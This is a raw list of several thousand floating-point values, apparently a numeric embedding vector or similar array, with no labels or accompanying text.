0.0146455904468894, -0.0015997998416423798, 0.0074353343807160854, -0.007947580888867378, -0.0014785294188186526, 0.03290795162320137, -0.004105732776224613, 0.0026310838293284178, -0.002111076144501567, -0.025860682129859924, -0.00020797883917111903, 0.018145941197872162, -0.03374617174267769, -0.020210448652505875, -0.000043596730392891914, 0.02649710886180401, -0.0017841309309005737, -0.013939311727881432, 0.021328076720237732, 0.0000922868202906102, 0.017354287207126617, -0.01611247844994068, 0.03306317701935768, -0.02275615930557251, -0.005153509322553873, -0.013721995055675507, 0.011424646712839603, 0.007699218578636646, 0.008886698633432388, 0.019977610558271408, 0.0359814278781414, -0.00832788459956646, 0.0011079268297180533, 0.013947072438895702, 0.010314780287444592, 0.025907250121235847, -0.02058299258351326, -0.003791399532929063, 0.019185956567525864, -0.01180495135486126, -0.01102105900645256, 0.0004722271696664393, 0.010314780287444592, 0.01682651787996292, -0.012356004677712917, -0.01247242372483015, -0.04215943068265915, 0.002000477397814393, 0.026838606223464012, 0.006026656366884708, -0.010012089274823666, 0.0018297286005690694, 0.009290287271142006, -0.0016230838373303413, -0.0014397228369489312, -0.05029328167438507, 0.05103836953639984, -0.01530530210584402, 0.0019092820584774017, -0.04451886937022209, -0.0013378557050600648, 0.02492932416498661, -0.004004835616797209, -0.0032267642673105, 0.02360990270972252, 0.0062245698645710945, -0.021778233349323273, -0.04361855611205101, 0.003127807518467307, -0.017338763922452927, -0.03171271085739136, -0.0011991222854703665, 0.0024409317411482334, 0.009026402607560158, -0.022725112736225128, -0.0021712263114750385, 0.031371213495731354, 0.013077805750072002, 0.008001909591257572, -0.0102992570027709, 0.008816847577691078, -0.01710592582821846, 0.0160814318805933, 0.008304600603878498, -0.01078821998089552, -0.019046252593398094, 0.007086075376719236, -0.02463439479470253, -0.015258734114468098, -0.022802727296948433, 0.024261852726340294, 0.01304676104336977, 0.011929132044315338, 0.027319807559251785, -0.000604411936365068, -0.03278376907110214, -0.007299511227756739, -0.014521409757435322, 0.0009876266121864319, 0.022088686004281044, -0.0009269913425669074, 0.0009507603826932609, -0.028608186170458794, 0.033901397138834, -0.021762710064649582, -0.00012515111302491277, -0.032535407692193985, -0.00904968660324812, 0.008545201271772385, -0.0110831493511796, -0.0411970280110836, -0.017199061810970306, -0.0028386989142745733, 0.027164582163095474, 0.028189074248075485, 0.04610217735171318, -0.028654754161834717, 0.009903430938720703, 0.0036710991989821196, 0.005006044637411833, 0.0011215091217309237, 0.012107642367482185, 0.02058299258351326, -0.014575738459825516, 0.026559200137853622, -0.022694068029522896, 0.020086267963051796, -0.015755457803606987, 0.012317197397351265, -0.030548512935638428, -0.007419811561703682, -0.03127807751297951, 0.0073227952234447, -0.020210448652505875, -0.031386733055114746, -0.017447423189878464, 0.049610286951065063, 0.007287869229912758, -0.0014707681257277727, -0.014606784097850323, 0.0031161655206233263, 0.0036090088542550802, 0.01667129248380661, 0.0005297093302942812, -0.01754055917263031, -0.0011292705312371254, -0.03719219192862511, 0.008607291616499424, 0.00899535696953535, -0.026792040094733238, -0.02939983829855919, -0.004893505480140448, -0.02828221023082733, -0.027909668162465096, 0.001764727639965713, 0.029477452859282494, -0.018766846507787704, -0.028344301506876945, 0.029198044911026955, 0.016298748552799225, 0.00428036181256175, -0.0472818948328495, 0.005692920181900263, -0.003931103274226189, -0.011564350686967373, 0.009173867292702198, 0.014389467425644398, -0.01665576919913292, -0.0022430182434618473, -0.03458439186215401, 0.03784414380788803, 0.019356705248355865, 0.006360393017530441, 0.018642663955688477, 0.020241495221853256, 0.0008071761694736779, -0.011478976346552372, -0.011463453993201256, -0.025720978155732155, -0.0005175822880119085, -0.01334169041365385, -0.002914371667429805, -0.008164897561073303, 0.034429166465997696, -0.03275272622704506, 0.01750951260328293, 0.011548828333616257, 0.01797519251704216, 0.02882550284266472, -0.04107284918427467, -0.027583692222833633, -0.0030560155864804983, 0.02519320882856846, 0.022197343409061432, -0.017633695155382156, -0.006135314702987671, 0.04914461076259613, -0.015584709122776985, -0.008622814901173115, 0.017788920551538467, -0.016640247777104378, 0.007307272404432297, -0.008715949952602386, -0.02898072823882103, 0.0021751068998128176, 0.014179911464452744, 0.020629560574889183, -0.014366183429956436, -0.01941879466176033, 0.006139195524156094, 0.00008682964835315943, -0.013714233413338661, 0.001175838289782405, -0.045015592128038406, 0.01238704938441515, 0.01172733772546053, -0.025317391380667686, -0.015212166123092175, 0.0003444080939516425, 0.01479305513203144, -0.02075374126434326, 0.008855653926730156, -0.01927909255027771, 0.050510600209236145, 0.0012049432843923569, 0.04908251762390137, -0.0008333705482073128, -0.013729755766689777, -0.003444080939516425, 0.04740607738494873, -0.026760993525385857, 0.014218718744814396, -0.006422483362257481, -0.0037215477786958218, -0.0017123388824984431, 0.00785056408494711, 0.03275272622704506, 0.03607456386089325, -0.0417247973382473, 0.04163166135549545, 0.0025224254932254553, 0.013784085400402546, -0.010392392985522747, -0.003337363013997674, -0.0073771243914961815, 0.00030681423959322274, 0.00582874333485961, 0.01726115122437477, 0.0034576633479446173, -0.026357406750321388, -0.001528977882117033, 0.015041417442262173, -0.0038379672914743423, -0.009561932645738125, -0.04014148935675621, 0.0019529394339770079, 0.02274063602089882, -0.06097284331917763, 0.01528201811015606, 0.018596095964312553, 0.017866533249616623, 0.014397228136658669, -0.001049717073328793, -0.004008715972304344, -0.03030015155673027, 0.005246644839644432, 0.0017152493819594383, -0.017866533249616623, -0.006981297396123409, -0.006923087872564793, -0.008110567927360535, 0.015600231476128101, -0.016485020518302917, -0.002656308002769947, -0.002817355329170823, -0.0051961964927613735, 0.03244227170944214, -0.020629560574889183, 0.004051403608173132, 0.018906548619270325, -0.006352631375193596, 0.029896562919020653, 0.031215986236929893, 0.036167699843645096, -0.013302884064614773, 0.002369139576330781, -0.032100774347782135, -0.017882056534290314, 0.007287869229912758, 0.001270914333872497, -0.012441379018127918, -0.0028134745080024004, 0.005817101337015629, -0.002448693150654435, 0.023113178089261055, -0.014047970063984394, 0.033901397138834, 0.009158344939351082, -0.0010807622456923127, -0.0221662987023592, 0.01592620648443699, 0.00015910684305708855, 0.02451021410524845, 0.022725112736225128, 0.025472616776823997, -0.0028755650855600834, -0.025860682129859924, -0.002415707567706704, -0.004466633312404156, 0.029011772945523262, -0.0021460019052028656, 0.01261212769895792, 0.008630575612187386, -0.007543992716819048, 0.020971057936549187, -0.009212673641741276, 0.02969476953148842, -0.0033470646012574434, 0.0072180177085101604, 0.0010506872786208987, -0.02741294354200363, -0.03433603048324585, 0.027925189584493637, -0.016003819182515144, 0.002479738323017955, -0.03132464364171028, -0.002988104010000825, -0.006212927866727114, -0.024712009355425835, -0.0011525544105097651, 0.005580381490290165, 0.01827012188732624, -0.01840982586145401, 0.015910683199763298, 0.007481901906430721, 0.019915519282221794, -0.012883773073554039, -0.01093568466603756, 0.02839086949825287, -0.045263953506946564, 0.014715442433953285, -0.009561932645738125, -0.02435498870909214, -0.007202494889497757, -0.012744070030748844, -0.03259749710559845, -0.01813041791319847, 0.029787905514240265, -0.023268405348062515, 0.013038999401032925, -0.0026310838293284178, 0.007183091714978218, -0.013287361711263657, -0.014684396795928478, -0.01710592582821846, -0.014016924425959587, -0.008785801939666271, -0.013287361711263657, -0.013310645706951618, -0.010470005683600903, 0.02955506555736065, 0.09164553880691528, -0.0031821366865187883, -0.017043834552168846, -0.01668681390583515, 0.003775876946747303, -0.018145941197872162, -0.022694068029522896, 0.002446752740070224, -0.04104180261492729, -0.0001934263709699735, -0.001985925016924739, -0.003201540093868971, -0.027723396196961403, -0.01043896097689867, 0.00927476491779089, -0.011184046976268291, 0.02419976145029068, -0.014591260813176632, 0.014288569800555706, -0.03768891841173172, -0.0007901982753537595, 0.021700620651245117, 0.04203525185585022, -0.0014998730039224029, 0.013279600068926811, -0.01585635542869568, -0.014001402072608471, -0.013101089745759964, -0.0273818988353014, -0.0017103984719142318, 0.012720786035060883, -0.0162521805614233, -0.01853400655090809, -0.025876205414533615, -0.004831415135413408, -0.001949058729223907, 0.024448124691843987, -0.008164897561073303, -0.003459603525698185, -0.009189389646053314, -0.010097463615238667, 0.014404989778995514, -0.015188882127404213, -0.011502260342240334, 0.02856161817908287, -0.0015241270884871483, 0.014987087808549404, 0.004226032644510269, 0.013085567392408848, 0.0019005505600944161, 0.0010953147429972887, -0.02724219486117363, 0.007307272404432297, 0.04777861759066582, 0.008289078250527382, 0.01574769616127014, 0.020784785971045494, 0.007675934582948685, -0.02331497333943844, 0.014195434749126434, -0.01035358663648367, -0.007555634714663029, 0.0045364852994680405, 0.007229659706354141, 0.0020722695626318455, 0.02798728086054325, -0.023097656667232513, 0.017711307853460312, -0.026621291413903236, 0.03654024377465248, 0.010206121951341629, 0.054111845791339874, 0.012604366056621075, -0.02027253992855549, 0.018145941197872162, 0.03626083582639694, 0.037161149084568024, 0.05693696439266205, -0.025472616776823997, -0.00971715897321701, 0.009903430938720703, 0.01915491186082363, 0.02596934139728546, 0.05032432824373245, 0.00913506094366312, 0.012581082060933113, -0.003459603525698185, -0.019030729308724403, 0.002111076144501567, -0.015476050786674023, -0.01654711179435253, 0.016329795122146606, 0.016702337190508842, -0.0035197536926716566, 0.02419976145029068, 0.03203868493437767, 0.03744055703282356, -0.00971715897321701, 0.007078314200043678, 0.014195434749126434, -0.007082194555550814, 0.010035372339189053, 0.03234913572669029, -0.023873787373304367, 0.010710606351494789, -0.013527961447834969, -0.016593679785728455, 0.0291204322129488, 0.006352631375193596, -0.0038185641169548035, -0.007842803373932838, -0.017757875844836235, -0.017214583232998848, -0.03896177187561989, -0.021095238626003265, -0.013473632745444775, 0.009142822585999966, 0.011292705312371254, -0.005700681824237108, -0.03318735957145691, -0.02249227464199066, -0.03654024377465248, 0.04625740274786949, -0.01606591045856476, 0.020505378022789955, -0.001963611226528883, -0.012938102707266808, -0.003595426445826888, 0.027785487473011017, 0.028778934851288795, 0.010167314670979977, 0.009243719279766083, 0.020489856600761414, -0.0368506945669651, 0.020924489945173264, 0.010927923023700714, 0.019977610558271408, -0.0077535477466881275, -0.017773397266864777, 0.0018869682680815458, -0.022973475977778435, 0.009732681326568127, 0.014575738459825516, 0.013015715405344963, -0.014086776413023472, 0.015468289144337177, -0.008343406952917576, -0.006185763515532017, 0.020846877247095108, 0.05678173899650574, 0.008351168595254421, -0.006150837522000074, -0.007264585234224796, 0.029803426936268806, -0.0032073610927909613, -0.013473632745444775, 0.029679246246814728, -0.022073162719607353, -0.013217509724199772, -0.01209212001413107, -0.0008537439862266183, 0.0026737709995359182, 0.022942429408431053, -0.00005893744310014881, -0.00017632724484428763, -0.0056968010030686855, 0.010896878316998482, -0.04324601590633392, -0.04113493859767914, -0.014443796128034592, 0.018797891214489937, 0.00017329548427369446, -0.006748458370566368, -0.022259434685111046, 0.03613665699958801, -0.01679547317326069, -0.008545201271772385, 0.012317197397351265, 0.005409632343798876, -0.017773397266864777, -0.007741905748844147, 0.007994148880243301, -0.011859280057251453, -0.02523977681994438, 0.01766473986208439, -0.02379617467522621, -0.003238406265154481, 0.010850310325622559, -0.01470768079161644, 0.000013786934687232133, 0.00735384039580822, 0.02288033999502659, -0.003783638123422861, -0.02347019873559475, -0.018440870568156242, -0.0013562887907028198, 0.014692158438265324, -0.005231122486293316, 0.007268466055393219, -0.015181120485067368, -0.009499842301011086, 0.02100210264325142, 0.008770279586315155, 0.008281316608190536, -0.010927923023700714, -0.02537948079407215, 0.0007877728785388172, 0.011106433346867561, 0.019046252593398094, -0.005339780822396278, -0.017602648586034775, 0.008242510259151459, 0.028173552826046944, 0.01896863989531994, -0.022290479391813278, -0.007512947078794241, -0.00720637571066618, -0.018673710525035858, -0.012627650052309036, -0.013326168060302734, -0.015895161777734756, 0.0013475572923198342, 0.01211540400981903, -0.001012850902043283, -0.010780458338558674, 0.03796832635998726, 0.021219419315457344, -0.020474333316087723, -0.02753712423145771, -0.0034130357671529055, -0.02086239866912365, 0.0009163195500150323, -0.007559515070170164, -0.01079598069190979, 0.0016182329272851348, -0.02247675135731697, -0.00778847374022007, 0.001227256958372891, 0.009810294955968857, -0.027940712869167328, -0.011090910993516445, -0.02553470805287361, -0.004408423788845539, -0.0021013745572417974, 0.006604874040931463, -0.00033325119875371456, -0.00514962850138545, -0.02275615930557251, -0.02334601804614067, 0.018766846507787704, 0.009507603943347931, 0.01594172976911068, -0.005006044637411833, -0.001963611226528883, -0.019465362653136253, 0.02983447164297104, 0.013139896094799042, 0.0012330779572948813, 0.03408766910433769, -0.01340378075838089, 0.03222495689988136, 0.005009924992918968, -0.02506902813911438, 0.015119030140340328, -0.01724562980234623, -0.013574529439210892, -0.01563127711415291, 0.011028820648789406, -0.0043463329784572124, -0.002398244570940733, -0.023377062752842903, 0.0102138826623559, 0.0016521887155249715, -0.024122148752212524, -0.022197343409061432, -0.017478467896580696, -0.0008750876295380294, 0.006895923055708408, 0.004804250318557024, 0.004218271467834711, -0.005708443000912666, 0.05811668187379837, -0.003393632359802723, -0.015111269429326057, 0.007245182059705257, -0.01029149629175663, -0.004866340663284063, -0.01116076298058033, -0.001495992299169302, -0.035577841103076935, -0.011587634682655334, 0.03830982372164726, -0.004323048982769251, -0.015670083463191986, -0.0006141135818324983, -0.0006369124166667461, -0.000480716087622568, -0.0021712263114750385, 0.00030899711418896914, 0.004245436284691095, -0.02086239866912365, 0.030952101573348045, 0.03169718757271767, 0.024541258811950684, -0.029787905514240265, 0.011090910993516445, 0.023656470701098442, -0.018239077180624008, -0.007097717374563217, -0.017043834552168846, 0.0003167584363836795, -0.005557097494602203, -0.021250464022159576, -0.014172150753438473, -0.017928624525666237, -0.011199569329619408, -0.0022197344806045294, -0.008250271901488304, -0.009096254594624043, -0.0025360076688230038, 0.010035372339189053, 0.01611247844994068, -0.04029671847820282, -0.01924804598093033, -0.0065660676918923855, 0.00551052950322628, -0.028732366859912872, 0.029244612902402878, -0.022942429408431053, 0.0007649740437045693, 0.00940670631825924, 0.02118837460875511, 0.0249448474496603, 0.028903115540742874, -0.007730263751000166, -0.0006213898304849863, 0.023951400071382523, -0.018673710525035858, 0.013853936456143856, -0.00849087256938219, -0.004804250318557024, 0.026186658069491386, -0.0010603888658806682, 0.02333049476146698, 0.015103507786989212, 0.003981551621109247, 0.02162300795316696, -0.02202659472823143, -0.006511738523840904, -0.0016939056804403663, -0.016733381897211075, 0.020769262686371803, -0.015491573140025139, 0.006744577549397945, 0.01592620648443699, 0.02317526936531067, 0.003865131875500083, 0.0025651126634329557, 0.016578156501054764, -0.010462244972586632, -0.027211150154471397, -0.005968446843326092, -0.009872385300695896, -0.016624724492430687, 0.00279213092289865, -0.0019868952222168446, 0.0034499019384384155, 0.0022973474115133286, 0.012006745673716068, -0.01665576919913292, 0.0019655516371130943, 0.0065000965259969234, 0.01478529442101717, 0.029601633548736572, 0.015064701437950134, -0.026838606223464012, 0.029477452859282494, -0.008289078250527382, -0.004501559305936098, 0.02823564223945141, 0.009825817309319973, -0.016267703846096992, -0.0004904177039861679, -0.005056492984294891, 0.006492335349321365, 0.019015207886695862, -0.011564350686967373, 0.014544693753123283, -0.0007285929168574512, 0.015390676446259022, -0.002836758503690362, -0.011649725027382374, -0.006666964385658503, 0.02159196138381958, 0.004323048982769251, -0.028654754161834717, 0.0063487510196864605, -0.018518483266234398, -0.009220435284078121, 0.0085607236251235, 0.020645081996917725, -0.00579769816249609, 0.029337748885154724, 0.01180495135486126, 0.017928624525666237, 0.03030015155673027, 0.002029582392424345, -0.014862907119095325, 0.02812698483467102, -0.014490364119410515, 0.012821682728827, 0.003040492767468095, -0.00038369972025975585, 0.008863414637744427, -0.026885174214839935, 0.006624277215451002, 0.010105224326252937, 0.0039446852169930935, -0.0033393031917512417, 0.0013106911210343242, -0.00928252562880516, -0.015623515471816063, -0.039768949151039124, -0.022274957969784737, 0.005949043668806553, 0.004579172469675541, -0.0006839653942734003, -0.0009216554462909698, 0.010889116674661636, -0.0034984101075679064, 0.0038961772806942463, -0.0012718845391646028, 0.007307272404432297, 0.02781653217971325, 0.014234241098165512, -0.010128508321940899, -0.024541258811950684, -0.005052612163126469, -0.008653859607875347, 0.014055730774998665, -0.0043463329784572124, -0.01585635542869568, -0.008273555897176266, -0.002147942315787077, -0.0017482348484918475, 0.001580396550707519, -0.023392586037516594, -0.0025437690783292055, -0.01267421804368496, -0.0008930356125347316, 0.021980026736855507, 0.010702845640480518, 0.00402811961248517, 0.009903430938720703, 0.0036148298531770706, -0.004198868293315172, -0.003849609289318323, -0.013504678383469582, -0.02260093204677105, 0.012061074376106262, 0.03740951046347618, -0.016034863889217377, 0.0205985140055418, -0.004156181123107672, 0.021359123289585114, 0.007637128233909607, -0.00992671400308609, 0.00030414629145525396, -0.018611619248986244, -0.016873085871338844, 0.011106433346867561, 0.004245436284691095, 0.005599784664809704, -0.00720637571066618, 0.011773905716836452, 0.0017521155532449484, 0.003574082860723138, -0.002541828667744994, -0.006026656366884708, -0.011440169997513294, 0.015150075778365135, 0.0002083426370518282, -0.03045537695288658, -0.01130822766572237, -0.0012039730791002512, 0.006624277215451002, -0.016034863889217377, -0.00041207700269296765, -0.004575291648507118, 0.011052104644477367, 0.0004118344804737717, -0.013869459740817547, -0.024417078122496605, -0.0006034417892806232, 0.018021760508418083, 0.015111269429326057, 0.011106433346867561, 0.005266048479825258, 0.018611619248986244, -0.01217749435454607, -0.002483618911355734, -0.0012553917476907372, 0.012480185367166996, 0.002200331073254347, -0.010780458338558674, -0.013396020047366619, 0.0003468334907665849, -0.017602648586034775, -0.010842548683285713, -0.018363257870078087, -0.0007023984799161553, 0.007062791381031275, -0.005157390143722296, 0.0137763237580657, 0.024448124691843987, -0.011153001338243484, 0.005483365152031183, 0.008941028267145157, -0.01912386529147625, -0.017307719215750694, 0.0031413899268954992, 0.018208030611276627, -0.024432601407170296, -0.014870668761432171, 0.013683187775313854, 0.016904130578041077, -0.008630575612187386, -0.005266048479825258, -0.0266833808273077, 0.013396020047366619, 0.010609709657728672, 0.003201540093868971, -0.004144539125263691, 0.01794414594769478, -0.014699919149279594, 0.010834787972271442, -0.009453274309635162, 0.0007795264828018844, 0.01999313198029995, -0.03057955764234066, 0.013908266089856625, -0.05134882032871246, 0.014567977748811245, -0.0027203387580811977, 0.008933266624808311, -0.00032646008185110986, 0.013745278120040894, -0.026357406750321388, -0.01842534728348255, 0.0033645275980234146, -0.009414467960596085, -0.01116076298058033, -0.008467588573694229, -0.0009007969638332725, 0.0008042656700126827, 0.022678544744849205, 0.0017948027234524488, 0.004354094620794058, 0.023811696097254753, 0.005886952858418226, 0.007078314200043678, 0.0037176671903580427, 0.03880654647946358, -0.008638337254524231, 0.01915491186082363, 0.02244570665061474, 0.0036051280330866575, 0.017276674509048462, 0.009639546275138855, -0.02070717327296734, 0.015476050786674023, 0.02232152596116066, 0.007485782727599144, 0.0044511109590530396, 0.007400408387184143, -0.0019102522637695074, -0.0033684081863611937, -0.023703038692474365, 0.0008624754846096039, 0.014016924425959587, 0.004416184965521097, 0.010664038360118866, 0.000799414818175137, -0.01958954520523548, -0.009647306986153126, -0.02435498870909214, 0.0009420288843102753, 0.013217509724199772, -0.011269421316683292, -0.003292735433205962, 0.014870668761432171, -0.0075362310744822025, -0.024851711466908455, 0.013504678383469582, -0.024743054062128067, -0.0015280077932402492, -0.004365736618638039, 0.0018200270133093, -0.015693366527557373, 0.020691649988293648, -0.017136970534920692, 0.009949997998774052, 0.006709651555866003, 0.00004035274469060823, -0.011339272372424603, -0.024277376011013985, 0.01896863989531994, 0.0003650240832939744, -0.01872027851641178, -0.005397990345954895, 0.005421274341642857, -0.006209047511219978, -0.01027597300708294, 0.0024583947379142046, 0.005200077313929796, 0.012666456401348114, 0.01636083982884884, -0.008537440560758114, -0.03116941824555397, -0.023283926770091057, 0.0029046698473393917, -0.00010053320875158533, 0.01435066107660532, 0.011478976346552372, -0.018782367929816246, -0.006535022519528866, 0.021234942600131035, -0.03595038503408432, 0.02291138470172882, 0.005401871167123318, -0.0002731010608840734, -0.005793817341327667, 0.012449139729142189, 0.007027865387499332, -0.0014144985470920801, 0.02537948079407215, -0.0031103447545319796, -0.00804071594029665, 0.016314271837472916, -0.004606336820870638, -0.015910683199763298, -0.00513798650354147, -0.01563127711415291, -0.013799607753753662, 0.01441275142133236, 0.009895669296383858, 0.018176985904574394, 0.004905147477984428, 0.01000432763248682, 0.01253451406955719, 0.004877982661128044, -0.011036581359803677, -0.012728546746075153, 0.012193016707897186, 0.0009046776103787124, -0.013962594792246819, -0.010819264687597752, 0.004373497795313597, -0.0006655322504229844, -0.003921401686966419, 0.013745278120040894, 0.007745786570012569, -0.014552454464137554, -0.00018651396385394037, 0.009088492952287197, 0.009080731309950352, -0.024898279458284378, 0.007023985031992197, 0.020645081996917725, -0.0002891087788157165, -0.00024533012765459716, -0.004323048982769251, -0.024851711466908455, 0.016640247777104378, 0.001174868200905621, -0.0008872146718204021, 0.014567977748811245, -0.005114702973514795, -0.009166106581687927, -0.028064893558621407, 0.014536932110786438, 0.012658695690333843, 0.0004892050055786967, 0.005642471835017204, -0.023718560114502907, -0.02870132215321064, 0.007190852891653776, -0.01726115122437477, -0.014156628400087357, 0.02432394213974476, 0.009981043636798859, -0.007912654429674149, 0.0015794264618307352, -0.004874102305620909, -0.016003819182515144, -0.04619531333446503, -0.003723488189280033, 0.0037972205318510532, 0.00037108760443516076, 0.004734398797154427, 0.010128508321940899, -0.004354094620794058, -0.012573320418596268, -0.0011913609923794866, -0.012200778350234032, -0.007237420883029699, 0.019915519282221794, -0.016469497233629227, 0.009546410292387009, 0.0004031029820907861, 0.011673009023070335, -0.00992671400308609, 0.013318406417965889, -0.01247242372483015, -0.007741905748844147, 0.028033848851919174, 0.0031336285173892975, -0.009608500637114048, -0.013411542400717735, 0.0284219142049551, -0.01116076298058033, 0.00652726087719202, 0.0030773591715842485, -0.014979327097535133, 0.00006215110624907538, -0.00849087256938219, -0.027785487473011017, -0.007415930740535259, -0.004156181123107672, 0.008389974944293499, 0.016159046441316605, 0.02230600267648697, 0.025907250121235847, -0.016283227130770683, -0.000023390039132209495, 0.018440870568156242, -0.019527453929185867, -0.017587127164006233, 0.01651606522500515, 0.00229928782209754, 0.024991415441036224, -0.004152300301939249, -0.005297093652188778, -0.01609695516526699, -0.013737517409026623, 0.008289078250527382, -0.007947580888867378, 0.016283227130770683, -0.0022255554795265198, 0.019915519282221794, 0.0012136746663600206, 0.014948281459510326, 0.006108150351792574, -0.004870221484452486, 0.00724906288087368, -0.01043896097689867, -0.017214583232998848, -0.004691711626946926, -0.011572112329304218, -0.008273555897176266, 0.013209748081862926, 0.02606247551739216, -0.007043388206511736, -0.0015124850906431675, -0.0023419749923050404, -0.007051149383187294, 0.01924804598093033, -0.013846175745129585, -0.009833578951656818, -0.010609709657728672, -0.018208030611276627, -0.0025592916645109653, 0.021328076720237732, 0.0014397228369489312, 0.014016924425959587, -0.006926968228071928, 0.007738025393337011, -0.019527453929185867, 0.01037687063217163, 0.003475126111879945, -0.0004918729537166655, -0.009414467960596085, -0.005607545841485262, 0.004893505480140448, -0.009251480922102928, -0.008250271901488304, -0.012278391048312187, 0.0034382599405944347, 0.011960177682340145, 0.00940670631825924, 0.006666964385658503, -0.008234748616814613, -0.0028794456738978624, 0.003378109773620963, 0.0011981520801782608, -0.001904431264847517, -0.002417647745460272, 0.001801593927666545, 0.011898087337613106, -0.01448260247707367, 0.015390676446259022, -0.024727530777454376, -0.0015493513783439994, 0.01769578456878662, 0.0077263833954930305, 0.02783205546438694, -0.02464991807937622, 0.014086776413023472, 0.013636619783937931, -0.004645143635571003, -0.013597813434898853, 0.012798398733139038, -0.03402557969093323, -0.00366139761172235, -0.010136269964277744, 0.0005723965587094426, 0.0205985140055418, 0.008436542935669422, 0.0008794533205218613, -0.00884013157337904, 0.009934475645422935, -0.008110567927360535, 0.00986462365835905, -0.011610918678343296, -0.006585470866411924, 0.01588740013539791, 0.030548512935638428, -0.01698174513876438, -0.015421721152961254, -0.0084753492847085, -0.0034906486980617046, 0.004408423788845539, -0.02811146154999733, -0.023299450054764748, -0.01811489649116993, -0.016935177147388458, -0.013000193051993847, -0.006457409355789423, -0.001830698805861175, 0.030207015573978424, -0.02884102426469326, -0.003374229185283184, -0.015988297760486603, -0.005836504511535168, -0.0023012282326817513, -0.016702337190508842, 0.02044328860938549, 0.01522768847644329, 0.014342899434268475, -0.013760801404714584, -0.011184046976268291, 0.0026601888239383698, -0.019356705248355865, -0.001967491814866662, 0.00724906288087368, 0.010485528968274593, -0.004264839459210634, 0.003403334179893136, 0.004606336820870638, 0.000688816187903285, 0.007078314200043678, -0.008545201271772385, 0.0023807815741747618, -0.022399138659238815, -0.011098671704530716, 0.005079776979982853, -0.026015907526016235, 0.0043851397931575775, -0.020101791247725487, -0.017043834552168846, -0.007916535250842571, -0.005917998030781746, 0.013853936456143856, 0.01036134734749794, 0.003224823856726289, -0.004369616974145174, -0.008661621250212193, -0.0013223330024629831, -0.026015907526016235, 0.019077297300100327, 0.018052805215120316, 0.00627501867711544, -0.01872027851641178, 0.009577455930411816, 0.011610918678343296, -0.009259241633117199, -0.01160315703600645, 0.012224062345921993, -0.0027475033421069384, -0.005491126328706741, -0.030098356306552887, 0.012829444371163845, -0.02118837460875511, 0.014187673106789589, 0.016205614432692528, 0.0049517154693603516, 0.002582575660198927, 0.010012089274823666, 0.019542977213859558, 0.0052544064819812775, 0.004365736618638039, -0.005972327198833227, 0.012332720682024956, -0.0032946758437901735, 0.012208539061248302, -0.006562186870723963, 0.007105478551238775, -0.01578650251030922, -0.00792817771434784, 0.001602710341103375, 0.020831353962421417, -0.006907565053552389, 0.013869459740817547, -0.00832788459956646, 0.006100389175117016, 0.008172658272087574, -0.02392035536468029, -0.004610217642039061, 0.014156628400087357, 0.011137478984892368, 0.0188599806278944, 0.009911191649734974, 0.01595725119113922, 0.004726637154817581, -0.0012146448716521263, -0.011269421316683292, 0.003962148446589708, -0.00157651596236974, -0.008009671233594418, -0.004990521818399429, 0.001904431264847517, 0.006647561211138964, 0.01064851600676775, 0.008188181556761265, -0.017757875844836235, -0.002151822904124856, -0.008289078250527382, -0.005956804845482111, -0.01478529442101717, -0.00897207297384739, -0.009515364654362202, -0.01247242372483015, -0.005110822152346373, -0.01433513779193163, -0.005665755830705166, 0.002693174174055457, 0.005044850986450911, -0.00038175939698703587, 0.028872070834040642, -0.003913640044629574, -0.010407915338873863, 0.0016812935937196016, -0.01837877929210663, 0.00011326660751365125, 0.0041600619442760944, 0.008514156565070152, 0.005956804845482111, -0.006977417040616274, 0.027273239567875862, -0.025643365457654, 0.012255107052624226, -0.011510021053254604, 0.03300108760595322, -0.007582799065858126, 0.012061074376106262, -0.009655068628489971, -0.023237358778715134, -0.005397990345954895, 0.005044850986450911, 0.006581590045243502, 0.0007315034163184464, -0.006938610225915909, -0.009895669296383858, 0.00604994036257267, -0.00979477260261774, 0.010889116674661636, -0.006612635217607021, -0.0019383869366720319, -0.010120747610926628, 0.016562633216381073, -0.008917744271457195, -0.020396720618009567, -0.025006938725709915, -0.010112985968589783, -0.011641963385045528, -0.026015907526016235, -0.005661875009536743, -0.00804071594029665, 0.025006938725709915, -0.005238883662968874, -0.004827534314244986, -0.024013491347432137, 0.02868579886853695, -0.014436035417020321, 0.01813041791319847, 0.01521992776542902, 0.014381705783307552, -0.008273555897176266, -0.0024913803208619356, 0.0013213629135861993, -0.0017074879724532366, -0.002147942315787077, -0.014529170468449593, -0.015895161777734756, -0.005607545841485262, 0.005122464150190353, -0.01435066107660532, 0.0067911455407738686, 0.022212866693735123, -0.0008207584614865482, 0.012053312733769417, 0.0110831493511796, -0.003709905780851841, -0.004330810625106096, 0.009561932645738125, -0.003647815203294158, 0.0032112416811287403, 0.02579859085381031, -0.007097717374563217, 0.0058481465093791485, -0.009655068628489971, 0.005153509322553873, 0.006069344002753496, -0.011502260342240334, -0.01310885138809681, -0.022352570667862892, -0.01667129248380661, -0.008746995590627193, -0.0038845352828502655, 0.02173166535794735, 0.014529170468449593, 0.00797086488455534, 0.00358766526915133, 0.005332019180059433, 0.018440870568156242, 0.019760293886065483, 0.007070552557706833, 0.02868579886853695, -0.0038302061147987843, 0.027071446180343628, -0.009329093620181084, -0.02579859085381031, -0.009391183964908123, 0.010958968661725521, -0.02087792195379734, 0.015056939795613289, 0.005145748145878315, -0.004315287806093693, 0.016314271837472916, -0.00787384808063507, 0.005029328167438507, 0.020086267963051796, -0.015693366527557373, -0.030501944944262505, 0.00326363043859601, 0.009849101305007935, 0.035857249051332474, 0.005925759673118591, -0.0049129086546599865, 0.004226032644510269, -0.014179911464452744, 0.001609501545317471, 0.016190091148018837, -0.005068134982138872, 0.015499334782361984, 0.003758413949981332, -0.013706471771001816, -0.01785101182758808, -0.02028806135058403, 0.013364974409341812, 0.012751830741763115, 0.0094299903139472, 0.0005190375377424061, -0.010881355032324791, -0.00789325125515461, 0.001223376370035112, -0.004769324325025082, -0.018751323223114014, 0.0009003118611872196, -0.01391602773219347, -0.003024970181286335, -0.010175076313316822, 0.026916220784187317, -0.013442587107419968, -0.006399199366569519, 0.0035566198639571667, 0.005153509322553873, -0.0008978864643722773, 0.00803295522928238, 0.005708443000912666, -0.004687830805778503, -0.0003640539071056992, -0.001443603541702032, -0.007745786570012569, 0.0004649509210139513, -0.024836190044879913, -0.00928252562880516, 0.025441572070121765, -0.015693366527557373, -0.013892743736505508, -0.0017171896761283278, 0.008692665956914425, 0.02522425539791584, 0.02654367685317993, -0.006973536219447851, -0.007741905748844147, -0.022585410624742508, 0.010951207019388676, -0.004893505480140448, 0.00023223292373586446, -0.015398437157273293, -0.0055648586712777615, 0.02553470805287361, -0.0005243734340183437, 0.02447916939854622, 0.011315988376736641, 